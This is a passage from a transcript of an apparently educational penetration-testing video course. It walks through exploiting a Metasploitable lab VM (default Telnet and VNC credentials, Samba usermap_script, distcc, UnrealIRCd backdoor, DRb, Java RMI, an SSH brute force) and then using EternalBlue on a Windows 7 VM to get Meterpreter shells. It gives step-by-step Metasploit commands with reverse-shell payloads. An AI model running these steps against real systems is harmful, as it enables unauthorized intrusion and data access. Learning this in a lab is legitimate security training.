that, we're getting slowly into harder and harder exploits. See you in the next video. Welcome to another attack that we will perform on our Metasploitable machine. And this one is aimed on Telnet. Keep in mind that this vulnerability is only possible due to information disclosure. And you will see by the end of this video why. So I got my scan right here and we can see that the Telnet is running on port 23. If we check out the version, it says Linux Telnet D. That doesn't seem to give us that much of information about the actual version. If we just copy this version right here, open another terminal, we could just do the same thing that we did with the FTP version. So we could type searchsploit and then paste the version name. And it seems that we got two different results. And from looking at them, they don't seem to be useful for us. The first one says Netcat Telnet 0.17 and it says in brackets that it's for Fedora 31. And the second one doesn't seem to be something we're looking for either. We can't get the exact version of Telnet, so what are we going to do? Well, we know that Telnet requires username and password in order to log in. So let's maybe try the default credentials. To try them and to connect to the Telnet port on some machine, we can type in our terminal, let's first clear the screen, Telnet, and then the IP address of the machine that we want to connect to. In my case, 192.168.1.5. And I press here enter. Do you see it? Not only do we get the banner for the Telnet, but we also get some additional information that shouldn't be here. We get this statement that says login with msfadmin/msfadmin. And if you remember this banner, and these things are exactly the same as the banner that we get once we log in to the Metasploitable. As you can see right here, these two are exactly the same. They just hosted the same banner on the Telnet open port as well. So if they already gave us username and password, let's use it. Let's see whether it will work on Telnet. If I type msfadmin and msfadmin as the password, here we are. Once again, we are on the Metasploitable machine. Just this time, you will notice that we are not root account. So if I type who am I, we are the msfadmin, we are not the root account. And this is something that we can easily bypass. If I type the command sudo su, it will ask me for the password for the msfadmin, and we already know it from the banner. It is also msfadmin. I type it in, press enter, and now we are root account, as we can see right here. And also if I type who am I, it will tell me we are root account. Now, I know what you're thinking, this is too easy. Something like this will never happen in real life. And you're correct, these types of vulnerabilities will rarely happen. However, we're slowly processing to higher and higher vulnerabilities. The last two were just misconfigurations and information disclosure, while the first FTP vulnerability had a vulnerable software running. After we finish showing a few more vulnerabilities for the Metasploitable machine, we're going to go on to the Windows machines. And you will see that we will manage to exploit them without them having any additional softwares like Metasploitable does. So things are soon about to get even more interesting. See you in the next video. Welcome back. Let's continue with exploiting our Metasploitable machine. So we already found 3 vulnerabilities regarding Telnet, FTP and the bind shell with no authentication. Let us see what else can we find. And what I got in mind for now is this Samba open port right here. Matter of fact, these 2 open ports, 139 and 445. Why them? Well, because it seems that we do not have the exact version of Samba right here. It tells us that Samba is between 3 point something to 4 point something. So let's see how we will figure out what exploit to use and how to find it. Here's a small hint. We don't need to Google it to be able to find it. We have everything we need right here in Kali Linux. So don't use Google to find it since it is cheating and you will most likely find it on the first link. Let's see whether we can figure it out by ourselves. So right here in our scan we have this Samba version right here. Not the exact version, but it does give us some information about in between which range does the version belong to. And that is something. We also see that ports hosting this are 139 and 445. So we do got some information. What now? Well, let's just search Samba inside of Searchsploit and see what comes up. So I got this scan right here, I got my MSF console right here, and I will open a third terminal and type Searchsploit Samba. Well, it seems that we get a lot of results. And these are exploits for a bunch of different Samba versions, as we can see right here. Now, we could just try all of them out to see whether they will work, or we can try to figure out the Samba version first, and then narrow down our exploit search and see whether we find something for that specific version. So, how are we going to find out the Samba version? Our Nmap scan didn't manage to do it. Well, luckily, Nmap is not the only scanner that we can use for these types of things. Remember that in Metasploit Framework, besides having all of these exploits and payloads, we also get those auxiliary modules. And those auxiliary modules can sometimes be scanners. Let's search and see whether we can find a scanner for this. If we just type in the Metasploit, search Samba, and press enter, we get some of the results right here. Matter of fact, we will get a lot of the results once again. Some are exploits, some are auxiliary modules, and down here I believe there is one post-exploitation module. And if we go to the auxiliary modules, it will only give us 2 auxiliary scanner modules. These aren't the scanners that we need. Let's try to find it ourselves. If I go down here, clear the screen, and type use auxiliary, and then we search for a scanner, and then SMB, because that is the port that we're enumerating, and then tap twice. These are all of the available auxiliary scanners that we have for SMB. The one that we are particularly interested in is this SMB version. So let's copy it. If I copy the entire command, right here, paste it, press enter. Oops, let me just delete this. We type the command twice. So use auxiliary scanner, SMB, and then SMB version. And if I type show info right here, it will tell me in the description display version information about each system. This looks like something that we need. Let's type all of the needed information for this to run. So we're going to type show options first, and we require our hosts. We got some other things as well, but these 3 things are not required, as it says right here. The threads we will leave on 1, and the R hosts will be the IP address of our Metasploitable. In my case, 192.168.1.9. I will set this right here, and if we run it, well, it worked. Even though it says right here host could not be identified, in the brackets we get the exact Samba version on the Metasploitable, which is 3.0.20. Cool. Let's see what we can find from exploits now that we know what version it runs. So I will copy this 3.0.20 and go back to my search exploit, clear the screen and type it once again. Just this time I will paste the entire version. Press enter and we managed to narrow it down to only 5 results. And it seems that these two are the same results, so it's actually 4 results in total. The first one seems to be some type of a security bypass, and it affects our version, since it's between 3.0.10 and 3.3.5. But it also seems to be a TXT file, which we really don't want to bother with right now. We want something that we can execute right away. The most interesting thing we have right here is this Samba username map script, or the command execution. Why? Well, it's a Ruby exploit, and it also belongs to Metasploit Framework. Plus, it also affects our version of Samba, as we can see right here. These two down here are also TXT files, not really interested in, and they also don't seem to actually affect our version. They only affect the versions below our version. And the last one, which is denial of service or DOS attack, seems to be affecting our version, but we are once again not interested in the denial of service attacks. But in a real penetration test, you would 100% write this on a report, with the references to the possible attack. For now, let's just go with the Metasploit module that we found. Let's remember the name, username, map script, command execution. And if I search once again, in my Metasploit, search Samba, let us try to find the exploit that we found using search exploit. If I go up here, go through all of these results, and here it is. Under the 13, exploit multi-Samba, user map, script command execution. This is the same script that we saw right here. Here it is. If I copy the script name, so exploit multi-Samba, user map script, and type right here use, then paste the script name, it will set the default payload to be command Unix reverse netcat. And by the way, this multi right here means that it can be targeted on multiple operating systems. While as if you had only Windows or Linux specified right here, it would mean that only that specific operating system is vulnerable to this attack. So let's show information about this exploit. I will first clear the screen and type show info, and it will tell us this module exploits a command execution vulnerability in Samba versions 3.0.20 through 3.0.25 when using the non-default username map script configuration operation. And if I also set up all of the things that we need, so show options, seems that we need one thing, which is the R host, so let's set it up right away. This is the IP address of Metasploitable. The port right here we do not want to change, since it is already set correctly, as we can see right here, port 139 is running Samba. And down here is our payload, which is the reverse netcat. We set the IP address of our Cal Linux machine here and any port that we want. Once all of this is ready, we can run our exploit. And here it is. We once again got command shell opened on target system using Samba vulnerability. And we can as usual execute commands. If I type who am I, it will tell me we are root. So we are already highest privilege on that machine. Great. This is the fourth vulnerability we found. To close the connection, we can just Ctrl+C this and click on Y, and you would write this down as another successful exploit if this was a real penetration test. In the next video, we're going to cover a different type of the attack that we haven't performed yet, which is brute force attack on port SSH. It is time to switch things up a little bit and check out a new type of the attack called brute force attack. Unlike the previous attacks, which were vulnerabilities, information disclosures or misconfigurations, right now we're going to perform something that will be more of a presentation of the attack than the attack itself, since we're going to cheat a little bit. But before I tell you how we are going to cheat, let's first explain what are brute force attacks. Well, brute force attacks is you sending a lot of different information to the target in order to figure out what information is correct. Now, you could be wondering, what do I mean by sending information to the target? Well, this can be anything. In 99% of cases, it is usually usernames or passwords, so we send a lot of usernames and a lot of passwords and hope that we by accident hit the correct one. And when is this useful? Well, you usually perform this attack to see whether the target has default credentials or weak passwords. These type of attacks will work, for example, if the target has a password that has a small amount of characters, or if it is very easy to guess. For example, password 123 is very easy to guess, but it is also one of the most used passwords in the world. In this case, we know that the MSF admin and MSF admin is one account on the target machine. So we will use those credentials to log in to the SSH. In that sense, this will not be a real attack, since we will be putting those credentials in two different lists. One list will contain usernames, and other list will contain passwords. Then we will run the brute force attack, and you will see it will automatically go through all of the usernames and passwords in those lists, and it will manage to find the correct ones, which are MSF admin and MSF admin. Let's do it. To perform this using Metasploit Framework, we're going to use an auxiliary module that is used for SSH login. If we search SSH, right here, we will get a bunch of the results, but the one that we are interested in is all the way up, I believe, and it is this one, auxiliary scanner SSH/SSH login. Let's copy the auxiliary module name, and let's type down here use and paste the module name. If we type show options for this module, we can see we have a lot of options available to specify. Keep in mind that only some of them are required and a lot of them aren't, as we can see by this column right here. Let's see what are the things that we need in order for this brute force attack to work. We got the brute force speed, and this is how fast it will try the passwords. We can specify a single password or a password file, and we will be going with the password file in our case. We must specify the R hosts, which is the IP address of the target. The R port is the SSH port on the target machine, and let's just double check, it is 22 here, and it is also 22 in our scan, so that is already set correctly. Here we can also set the username, and this username field is a single username, or we can set the user file, which will be the file containing a bunch of usernames. Another possible option that we can do is set user pass file. And what this user pass file is a file containing both usernames and passwords. As it says right here, file containing users and passwords separated by space, one pair per line. Now for this particular attack, we're going to be using a password file and a user file separately. So what we must do first is we must create those files. Let us open another terminal, navigate to the desktop of our Mr. Hacker account, and let's nano usernames.txt. This will be our list containing usernames. And let's just, for the purposes of this tutorial, write a few of them. So admin root test123. Let's go with the system and MSF admin. We must add the correct one in order for the SSH brute force to be able to find it. And after it, let's add one more. Let's call this one admin123. So this is 6 usernames. Of course, in a real-life attack, you would be using much bigger lists. But for now, for the purposes of this tutorial, we will create these small lists and see whether it will work. So we got our usernames file right here, and it has the correct username specified. Let's save it. Now we need to do the same thing with the password, so let's nano passwords.txt. Here let's type password 123, hello world. Let's also type msfadmin, which is the correct password and we know it at the moment. And at the end let's type test1234. So here we have 5 passwords and one of them is the correct one. Let's save this file. And if I type ls, we should have both of the files in our desktop directory. Let's specify them right here in our options. So the password file must be the entire path to this passwords.txt. So we must specify the entire path. To check out the entire path, I can type print working directory inside of the desktop directory and copy this. And inside of our Metasploit framework, we can type set pass_file and then paste the path, add slash, and then passwords.txt. This now set the path to the pass file to be this path right here. And we must do the same thing for the usernames. Let's type set user_file, paste the same path right here and add, instead of passwords.txt, let's add usernames.txt. Press enter, and if I type show options once again, let's see what else do we need to specify. Here the password file and the user file has already been specified, but we must also specify the rhosts for this to work. So let's do it. If I type set rhosts, type the IP address of my Metasploitable, clear the screen, and I check out options once again. All seems to be set. We will leave the brute force speed to be 5, which is the fastest. And one more thing that we want to change is this verbose right here. This is currently set to false. We want to set it to true. And this verbose means that it will print out even the failed usernames and passwords. It will not only print the successful login. Let me show you right here. If I set verbose to be equal to true, clear the screen and run this, here it is. It started our attack. It is going to try every single combination of usernames and passwords from those 2 files. Now, you might notice this isn't going that fast, and it will print out all of these failed passwords until it reaches the combination of msfadmin and msfadmin, as both username and password. Let's wait for that combination to come. And here it is. We found the correct SSH username and password. Once it prints out this success rate here, this means it found the correct username and password. And you can just Ctrl-C this if it didn't stop, in order to stop the brute forcing. Now, I know what you're thinking once again. This is not a true attack, since we added username and password to the list. But once again, remember that you will do this for the weak credentials and default passwords. And of course, in real attacks, you will be using much bigger lists than these that we created right here. And many of those bigger lists we can find inside of our Cal Linux machine. However, more about them later. For now, we just tested it out to make sure that this brute force attack works. We can also see right here, it opened the command shell as soon as it found the correct username and password. But if you press Ctrl-C or you waited for this to finish, it doesn't seem that we can execute commands anywhere. We just went back to our auxiliary module right here. We're not inside of a shell. Well, once something like this happens, Metasploit saves the shell in the background so we can still enter that shell. To check out all of the available shells that we currently have established, we can type the command sessions. And here we can see we got one shell over SSH to the IP address of the Metasploitable. To enter inside of this session, we can type the command sessions -i and then the session ID. In my case it is 1, and it will probably be in your case as well. So if I set here sessions I1, this will start interaction with this shell and it will open our shell right here. And you can now execute the commands as usual. Who am I? Will tell me that I'm msfadmin. If I want to become the root account, I type sudo su, type in msfadmin password, and I type who am I once again, now I'm root account. Another way that you can establish SSH connection once knowing the username and password is like this. First, let's exit out of this, exit out of Metasploit Framework, and now that we know the username and password of the SSH, we can open our terminal and type SSH msfadmin, which is the username, and then the IP address of the Metasploitable, which is 192.168.1.9 in my case. If I press here enter, it will ask me this question: are you sure you want to continue connecting? I want to specify yes right here. And it will ask me for the password for this specific account. And we know that the password is msfadmin, so I will type it right here. And here it is. We opened the terminal of the Metasploitable. If I type who am I, we are msfadmin. And that would be about it for the SSH brute force attack. Don't worry, real brute force attacks we will perform later regarding website login forms and Wi-Fi cracking. This video was just to introduce you to the concept of brute forcing. If you were to exploit a target like this in real life, it would be considered weak credentials or default credentials vulnerability, and you would of course write it down as a critical vulnerability. Great, that is another vulnerability covered. Let's go and hunt the next one down in the next video. Okay, it is time for a small challenge. We can say we are getting more and more familiar with MSF console and exploitation, and by now you should be familiar with the entire process of searching for a vulnerability and trying to exploit it. Let's put all of that to the test. So for now we covered about 4 to 5 vulnerabilities on the Metasploitable virtual machine. And what I want you to do in this video is find 3 different vulnerabilities that will give you a shell back on the target machine. You can use any tools that you want, besides searching for links that will give you the exact steps to exploiting the vulnerability, and feel free to use Google if you want to see if a software is vulnerable. You can also use Searchploit to see whether you have exploit in your database. You can use Nmap to scan and Metasploit Framework to exploit. After we do this challenge, we are ready to move on to some harder Windows exploits. And after that, we're going to see how to exploit the target without using MSF console and without having an exploit available inside of our Kali Linux machine. Okay, great. So pause this video right now, give yourself 10 to 20 minutes and try to find 3 different vulnerabilities on the Metasploitable that will give you a shell back. I myself will do it right now, so if you don't want me to spoil it for you, then try to find them first and then watch this video. The harder part is to find them, however, once you find them, it is easy to exploit them. Let's get straight into it. Let's start by scanning the target for all the open ports and its services. So what I'm going to do is I will perform the usual Nmap version scan on my Metasploitable, and I will use -p-, which stands for scan all 65,000 ports. If I press here enter my password, and by the way, of course the vulnerabilities that we covered don't count at the moment. We will not pay attention to them at all right now. We want to find new vulnerabilities. So while this scan is working, I will go to a second terminal and I will start the MSF console. And I will also open a third terminal in case we need something like a Searchploit or some other tool to run right here. So the goal is to find 3 vulnerabilities. Let's see after our scan finishes whether we manage to do so. And here are the results of the scan, so we got a bunch of ports open as usual, and let's go and pick any one of them. For example, I know for a fact that this dist-c open port, which is 3632, is vulnerable. It is running dist-c version 1, and if I go to my Metasploit Framework and I just type search dist-c, I will only get one exploit available. Dist-c execute or daemon command execution. It is ranked excellent, so since this is the only exploit, let's give it a try. I will copy it, I will type use and then paste the exploit name, clear the screen, we can show info just to know what this exploit does, and it says that this module uses a documented security weakness to execute arbitrary commands on any system running distc cd. And our system is indeed running distc cd. So what we're going to do is we're going to type show options and set the rhosts to be the IP address of our Metasploitable. Let's see show payloads. So we got quite a few payloads right here. Let us use this one, CMD Unix reverse. So this is reverse TCP over telnet. Let's set it right here. Since at the moment, if I show options, we don't have any payload set up. Let's set payload CMD Unix and then reverse. Show options once again. Now we need to set the lhost, so I will type sudo ifconfig, enter my password. My IP address is 192.168.1.8. Let's copy it and let's set lhost to be equal to that IP address. Now if we triple check all of our available options, we should be good to go. Let us run our exploit. And here it is. First one is over. We got the command shell session 1 opened on the target machine. If I type who am I, we're daemon. If I type ls or print working directory, we're in the /tmp directory. Hostname command will tell us that we're Metasploitable, and uname -a will tell us that we're Linux Metasploitable 2.6.24, and here we also get some other information such as date and which version of Linux it is. Great. So, first one is done. Let us Control-C this, abort session 1, select yes, and let's go back to our scan to find another vulnerability. So, if you remember, during our scans, once we performed the vulnerability scan, we noticed that this Unreal IRC was vulnerable. We got from some of our scans result that this specific service is vulnerable to some type of the attack. So let's give it a try. Let's go to our searchsploit and type searchsploit IRC. And this gives us a bunch of different information. So this isn't really useful for us. Let's try it like this. Let's go to our scan and copy Unreal RCD, which is the version. And now if I type searchsploit and then the name of the version, well, we narrow it down to 4 results. And one of them doesn't count since it is remote denial of service. Out of all of this, we got one Ruby exploit, which means it belongs to Metasploit Framework. It is for the version 3.2.8, and it is backdoor command execution. Let's search it inside of our Metasploit Framework. So search, and then Unreal RC. And we do get indeed only one exploit for this. It is ranked excellent, and it is from 2010. Let's copy it. Right here, copy selection, and as usual, use this exploit. Show info will tell us that this module exploits a malicious backdoor that was added to the Unreal RCD 3.2.8 download archive. So as it says, this module will exploit some malicious backdoor that was added in this specific version. And if we show options, we need to set the rhosts as in the previous exploit, and we also need to set the payload, but before we set it, let's show our available payloads first. Show payloads, pardon me, not show options, and we get the same result as previously, so we're just going to go with the reverse TCP over telnet. And if I type set payload and then paste the payload name. Now we need to set the lhost to be the IP address of our Cal Linux machine, and if we triple check our options, everything is set. Type run. And here it is. Command shell session 2 open. We got the second exploit down. Let's check out if it works. Who am I? We are the root account. Host name will tell us we're Metasploitable. So this is the second one down. We got one more left to go. Let's Control-C this. Go back to our scan. And we're doing this really fast tempo because we already are familiar with all of these tools and techniques that we use to exploit these vulnerable softwares. If you didn't manage to find 3 different exploits, don't worry, this comes with the practice. So after some time practicing, you will be able to find even more than 3 exploits. Let's continue on the third one. So if I go down here and check out what different services we got running, this one, which is running over port 8787, running service DRB, I know for a fact that it is vulnerable. So let's give it a try. The service name is DRB. So if I type in my search exploit DRB, well, we only get a few results right here. And it doesn't seem that any one of them belongs to the Metasploit framework, as we can see right here, since these are Python files. So let's just double check. Whoops, not here. Let's just double check right here if we can find something regarding DRB, and we do manage to find it. So we got these 2 exploits, which are for the multi, and we got this DRB remote code execution. And it says distributed Ruby remote code execution. And if I go right here under the version, we can see that it is running Ruby. So let's just give it a try, you never know. If we copy this exploit, which says DRB remote code execution, and we use it right here, show our options, we can see by default it has set the payload to be CMD Unix reverse Netcat, and we got 2 different things to set up. Matter of fact, one of them is URI, which is not really needed, so we can only set our hosts. And for some reason it does say that our host is not required, but I'm not really sure how it is not required, so we will just specify it anyway. Set our hosts 192.168.1.7. Since the payload is already been set, let us just run the exploit. And here it is. We got command shell session 3 open. Let's type who am I? We are root account, and once again hostname will tell us we're a Metasploitable machine. And with this we completed our challenge. We found 3 different vulnerabilities that gave us a shell back. But these are not the only ones, so matter of fact, let me just show you 1 or 2 more that you could have found if you performed this challenge. The one that is a little bit different to exploit is this VNC service running on port 5900. It is running protocol 3.3, and if we just search in the search exploit, search VNC, search exploit VNC, we will get a bunch of the results right here. So let's add the version 3.3, and we do get some of the responses right here, but it does say that these are for Windows. Now, we are not going to give up just because we cannot find the exploit using search exploit. Matter of fact, it probably is somewhere right here, just there is a bunch of results and we don't really want to read through all of this to find the exploit that we need. So let's just go straight to the Metasploit and type search VNC. And if I scroll all the way up, since these are just payloads, I come to exploits, we can see there are about 5 or 6 exploits. And these 4 are for Windows, so we can forget about them straight away. We got this one, and we got this one. This one seems interesting. It is an exploit for multiple operating systems, for VNC, and it says VNC keyboard execution. So let's just copy the name and see whether it works. Now, this is just a part of penetration test. If you don't know an exact exploit, you simply just try a few different ones and see if they work. Just get used to it that some exploits will sometimes not work, and you will have no idea why they don't work. So let's just type set, or pardon me, let's just type use, and then the exploit name. And this seems that it isn't an exploit for us, since it is also setting the Windows payload. We cannot find a VNC exploit, so what are we going to do? Well, if I go right here, and instead of searching for an exploit, I simply just try to connect to the VNC using a tool called VNC Viewer, and all I need to specify to connect to is the IP address to that target machine. Press enter. It seems to be asking for a password. Well, let's try MSF admin, which is the usual password for everything in Metasploitable, and it tells us authentication failure. But if we try it once again, and as a password, I simply just type password, well, it worked. The VNC viewer password was just password. And now I got root shell opened on the Metasploitable. I can execute commands right here, such as ifconfig, such as hostname, ls, and I can see anything that is on the target machine. So this exploit was a little bit different because it was due to a weak password. I just connected to the VNC and I typed password and it granted the access to the root shell of the Metasploitable. Great. To exit this, I can type exit and I can exit this desktop right here. And let me show you just one more and then we're going to end the video. And that one is over port 1099. It is running Java RMI, and if I go in my Metasploit Framework and search for Java_RMI, well, we get two exploits right here. Let's try with this one first. So exploit multi, misc Java RMI server, copy the exploit name, go right here and type use. It will set the default payload to be Java Meterpreter reverse TCP. Now this is the first time that we're encountering a Meterpreter payload. You will see that it is a little bit different than all the other shells that we got in the previous exploits. So if I type show options, there are a bunch of things that I need to set. Our payload options has already been set to correct one, to the correct IP address and to the correct port. All we need to set right here is the R hosts. You can just leave the server host and server port to be 0.0.0.0 and 8080. If I go right here and type set R hosts 192.168.1.7 and I run this, well, here it is. We got the Meterpreter session 4 open. And if you want to execute the commands, you can just wait for this exploit to finish, and even though it says right here exploit failed, if I type sessions, I will have the Meterpreter session 4. And I can enter that session by typing sessions and then -i, and then the ID of that session, which in my case is 4. And I've entered the Meterpreter shell. Right here the commands are different. To check out all the commands that we can run with the Meterpreter, we can type the help command. And you can see it is split into different sections, such as file system commands, such as core commands, and all of these commands work with Meterpreter shell. We can download and upload files, we can execute a command, we can screen share, we can perform a screenshot of the target machine, we can record the microphone, and many other things that we're going to check out later. But for now, we can use a command called shell to enter the command shell with the target machine. So if I type who am I once again, right now I'm a root account with the IP address of the Metasploitable. Great. Now I left this Meterpreter shell for the end, just so we can slowly start getting into using Meterpreter shell on our target machine. As we can see, there is a lot of the commands that we can run. Now, in the next video, we're going to start with Windows exploitation. And in Windows exploitation, we're most likely always going to want to open a Meterpreter shell. So that would be about it for this challenge. Once again, if you managed to find 3 different vulnerabilities, congratulations. If not, don't worry, this comes with practice. Now that we covered Metasploitable vulnerabilities, which were rather easy, it is time to move on to the Windows vulnerabilities. See you in the next video. Welcome back. It is time we switch things up a little bit and move on to a different target. For the next few videos, we're going to be attacking Windows 7 machine. And the difference between exploiting Windows 7 and the Metasploitable that we were attacking in the past few videos is inside of Windows 7, we are not going to install any additional software. So these exploits will work on anyone that uses Windows 7 and hasn't updated their operating system, which is most likely everyone running some pirated version of Windows. For this, you will need to install Windows 7 virtual machine. And I got mine right here, it is currently up and running. And you will need to install them inside of your VirtualBox first. You can take a look at YouTube how you can download Windows 7 ISO file, since the ISO file is something that you will need for the installation of VirtualBox Windows machine. And if you can, try to download the 64-bit version of Windows 7. Once you get the ISO file, the installation process is rather easy. Just go to the VirtualBox, then click on New right here. You can type in anything you want, you can call it Windows 7. You can select right here which version you got, either 32-bit or 64-bit. And once you select it, click on Next. Let me just see right here, cannot create, this folder already exists. Yeah, this folder already exists because I have already created the Windows 7 machine. But if I call it, for example, Windows 77, just so I can change the name of the virtual machine, click on Next. Here what you want to do is you want to add at least 2 GB of RAM. Now, in case you don't have 2 GB of RAM, feel free to add 1 GB, but in that case I'm not sure whether it will work, since I haven't really tried it. Once you create the virtual machine and set the RAM, you can click on Next. Right here select Create a virtual hard disk now. Click on Next, Next, Next. Here you can select the hard disk size. You don't need to go too much, you can just choose something like 20 to 30 GB, click on Create, and your virtual machine will be right here. Once you do all of that, there are just a few more settings that you need to set up. So just go right here onto the settings. And in the storage, you want to delete this empty right here. And under the controller, you want to add the Windows ISO file. So in my case, here is mine, Windows 7 Ultimate x64.iso. I would choose that one, and then I would proceed to the network settings and change from the NAT to the bridged adapter. Select your adapter right here and click on Create. After you do all of this, you can start your process of installing Windows 7. And the process is rather easy, as I already mentioned. However, there is one important step that we need to pay attention to. And I got the screenshot of that step right here on my desktop. As far as I remember, this step happens, I believe, at the very end of installation, and here it asks us help protect your computer and improve Windows automatically. Here we want to select the last option, which is Ask Me Later. It says, for that option, until you decide your computer might be vulnerable to security threats. And by selecting this, we are simulating a vulnerable Windows 7 machine that wasn't regularly updated. Once you do all of this, you should be ready to go. The other steps of installation are not important, just remember, once you get to this step, select Ask Me Later. Okay, so right now I got both of these machines up and running. I got Kali Linux and Windows 7. And if I go to my VirtualBox right here, and besides this Windows 77 machine right here that I created right now, so I will just delete it since I don't really need 2 Windows 7 machines. Besides it, you will see I got these 2 Windows 7 machines. So I got Windows 7 32-bit and Windows 7 64-bit. And both are installed with a different ISO file. And the reason why I got 2 of them is just to show you that sometimes some of the exploits won't work. And that doesn't mean you didn't perform the exploit correctly. It's just that sometimes they just don't work. Whether it is due to architecture or some Windows update, it doesn't matter. Just you will see that, for example, some of the exploits will work on this version of Windows 7, but on this one it will not work. Now, there is also one thing that we must do on the target machine before we actually attack it. So once you install Windows 7 and you have it up and running, go to it, and from the desktop you want to type Control Panel, and in the Control Panel we want to disable the firewall. The reason we do that is because the attack that we're going to perform targets port 445, which is by default open on Windows machines. However, it is also by default being filtered by a firewall that is automatically on every time you install a Windows machine. So for our exploits to work, target has to have that port unfiltered by the firewall for us to be able to exploit it. In companies and larger networks, that usually is the case. This port will be open and unfiltered. Why? Well, because it is SMB protocol or server message block protocol. It is used in network file sharing and it allows applications on a computer to read and write to files and to request services from server programs in a computer network. It is basically used for different directory access or for printer access or something similar. That's why it is usually open inside companies without any firewall whatsoever. Let me show you what I mean. If I go right here and under the System and Security, I click on Windows Firewall. I already have it disabled, but by default you should have it like this. So you should have Firewall up and running. If I leave the firewall up and running and I go to my Cal Linux machine and scan it real fast, so sudo nmap, we're going to use the synscan. In order for this to work, I need to know the IP address of my Windows 7 machine, so I will just type ipconfig inside of the command prompt and it will tell me it is 192.168.1.8. So if I go back and scan that IP address, input my password, this scan shouldn't take more than just a few seconds, and you will see right here that these ports are open. But for you, they will probably not be open. Why? Well, because you haven't really disabled the firewall yet. So even though I scan it right now once again, while the firewall is on, you can see in the scan results, ports are set to be open. What you are going to see, in case you haven't disabled the firewall already, is you will most likely see 1000 ports filtered. And to fix that, what you can do is go right here, click on Turn Windows Firewall on or off, then select right here Turn off Windows Firewall, and turn off Windows Firewall in the second option as well. Click on OK, and now the firewall is off. Now if you go and perform the scan once again, for me I will have the same results, but for you, you will have much more ports open. And I also get some ports open that weren't open once the firewall was enabled. Besides all of those ports, you should also see the port 139 being open and the port 445 being open. And those are SMB ports. So the key thing to get from this is go to the Windows and disable the firewall. Once again, Control Panel, System and Security, and then Windows Firewall. After you do all of that, you are ready to go. In the next video, we are going to see how to perform one of the most known recent exploits called Eternal Blue. See you in the next video. Hello and welcome back. Time to get our first exploit on the Windows machine. And we will go first with the famous Eternal Blue exploit. It is the NSA exploit that got stolen and leaked, and that was used for the famous WannaCry ransomware attack in 2017. If you want to read more about it, you can Google it right here, and it has a very interesting story. As we can see right here, you will undoubtedly recall the names shadow brokers who back in 2017 were dumping software exploits widely believed to be stolen from the USA National Security Agency, and WannaCry, the notorious ransomware attack that struck only a few months later. You can also read some other information about the exploit, like what is Eternal Blue, and we can see its vulnerability name, CVE 2017 0.3-20148. And as it says, this is a family of critical vulnerabilities in Microsoft SMB version 1, server used in Windows 7, Windows Server 2008, Windows XP, and even Windows 10 running on port 445. You can read some other information as well if you want to, and right here it also tells us that even after 2 years of this exploit being patched, there are millions of machines on the internet that are still vulnerable to this attack. And what this exploit does basically is it exploits a mathematical error inside the SMB. And luckily we got that exploit right here inside of our MSF console. So for now what I got right here is the scan of my Windows 7 machine, and your scan should look similarly to mine. Now these ports right here are not important. What is important is that you have these ports right here open, so port 445 and port 139. Also make sure that your Windows machine is up and running, and if I open my MSF console right here, we're going to try to find that exploit and test it on our Windows 7 machine. One more thing is that besides this exploit that we have in our Metasploit framework, we also get the auxiliary module for this exploit. What does this mean? Well, it means that we can test the machine to see whether it is vulnerable before we actually exploit it. Let me show you what I mean. If I type right here search and then eternal blue, I will get 6 results, 2 auxiliary modules and 4 different exploits. This is the one that we're currently interested in. Exploit Windows for the SMB, and it is called MS17 Eternal Blue. But before we use it, we can use the auxiliary scanner for the SMB and for the same vulnerability, as you can compare these names right here, to see whether our target is vulnerable. So let's test this auxiliary module first. If I type right here use and then paste the auxiliary module, clear the screen and show my options, there are a few different things that we need to set up, but the only required things is the R hosts. So let's set our hosts to be the IP address of our Windows 7 machine. In my case, it is this one. And if I type show info, so we can also read what this module does, it uses information disclosure to determine whether the eternal blue has been patched or not. And here it describes you how exactly does it do it. So if I triple check our options, everything seems to be set. You don't want to change these named pipes, and you also do not want to change the R port. So only thing you need to set up is this R host right here. And let us type run. It will finish in just a few seconds, and it will tell me host is likely vulnerable to the eternal blue attack. It even gives us the version, Windows 7 Ultimate 7601, Service Pack 1, 64-bit. Great, our target seems to be vulnerable. Let us now perform the exploit, and you will see how easy it is. So if I search eternal blue once again, I copy the exploit name, which is this one, clear the screen, type use. It will by default set the payload to be Windows Reverse Interpreter Shell for the 64-bit machine. Now, since it will set this by default, you must consider changing this in case your Windows 7 machine is a 32-bit machine. If it is a 64-bit, you can simply just leave this to be Windows 64-bit Interpreter Reverse TCP. If it is not, then you want to set payload to be equal to Windows /Meterpreter /Reverse TCP. And you will notice the only difference between this payload and this payload right here is this 64. So this just indicates that this is a 64-bit payload. Now I will not run this command because my Windows 7 machine is 64-bit. I will just type show info. And here we can see the exact definition and description of the exploit. This module is a port of the equation group Eternal Blue exploit, part of this toolkit right here, released by Shadow Brokers. There is a buffer overflow operation in this function right here. The size is calculated in this, so I'm not going to read this, of course, with mathematical error where a D word is subtracted into a word. Okay, so since our target is vulnerable, at least the auxiliary module told us, let us check out the options and let's run the exploit. So here as well we got few things that we need to set up. My payload is automatically set right here to the IP address and the port. These two we do not want to change. The R port we do not want to change, and the R hosts we need to set to the IP address of Windows 7 machine. Once everything is done, we can type run, and this will start our exploit. And in just a few seconds, I should get the Meterpreter reverse shell open on the Windows 7 machine. And here it is. Down here it will print out this win, which means the exploit worked successfully. And I got my Windows 7 machine. If I type the command get UID, which stands for get user ID, it will tell me that I'm currently on that machine as the system account. And this is the highest level account on a Windows machine. Great, we successfully exploited our first vulnerability inside the Windows 7 machine. And by the way, since we haven't really covered the Meterpreter yet, remember that we can run the help command, and here we can execute all of these commands that the Meterpreter shell gives us. But for now, we are not going to do that. We're going to cover these commands and a bunch of other commands that we don't have here in the post-exploitation module, which is coming soon. For now, we just want to gain access to the target, and in this video we successfully did it. But I want to show you one more thing. So don't worry, I know that you're impatiently waiting for us to actually do something on the target, but for now, the goal is to only gain access to it. If you want, you can test these commands by yourself. You can just simply type screenshot, for example, just to show you how it works. And it will take the screenshot of the target's desktop. It will save it in the /home/Mr. Hacker. So let's check out that directory. If I lower my terminal right here and go to the /home/Mr. Hacker, open the folder, here is the screenshot that we took of the target's desktop. It is saved on our machine. And that is just one of the cool commands that we can do with the Meterpreter shell. Others we will cover later. For now on, let me show you one more thing. If I exit out of the shell, I just want to show you if I open the second Windows 7 machine that I got right here, and there is no difference between these two machines. Just one is a 32-bit and the other one is a 64-bit machine. I just want to show you that on this one, which is the 32-bit one, the exploit will not work. Even though the auxiliary module will tell us that the machine is vulnerable. So I will just wait for this machine to open up. Matter of fact, if I remember correctly, the exploit will crash this Windows 7 machine. It will not manage to gain the Meterpreter shell, but instead this Windows machine will get the blue screen of death, and then it will crash. Let's see what happens. So I will log in to this machine. I will check two things out. Once it opens up, I 